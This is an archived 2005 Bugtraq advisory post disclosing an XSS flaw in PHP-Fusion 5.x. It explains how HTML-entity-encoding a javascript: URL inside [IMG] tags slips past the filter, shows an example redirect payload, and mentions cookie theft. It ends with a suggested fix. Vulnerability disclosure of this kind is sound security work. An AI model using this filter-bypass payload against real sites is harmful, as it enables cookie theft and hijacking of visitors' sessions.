[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: PHP-FUSION 5.* XSS VULNERABILITY
From: FireSt0rm <firest0rm.uh () gmail ! com>
Date: 2005-03-06 16:58:45
Message-ID: 20050306165845.9938.qmail () www ! securityfocus ! com
[Download RAW message or body]
I found an exploit in the current version of php-fusion which allows you to input XSS \
in the [IMG] tag. I reported it already to php-fusion and they created a fix for \
this. Here it goes:
By converting the text (ie. javascript:alert('test')) to their ascii values, the \
strings between the [img][/img] tags aren't checked by the filter. And this way, you \
can send it and it will be executed.
You can do other things like display cookies, steal cookies, redirections etc.
EXAMPLE:
[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]
would be replaced by
[IMG]javascript:docume& \
#110t.location='http: \
7/www.albinoblacksh&# \
101ep.com/flash/you.html'[/IMG]
FIX:
Filter out characters like '&' and '#'.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic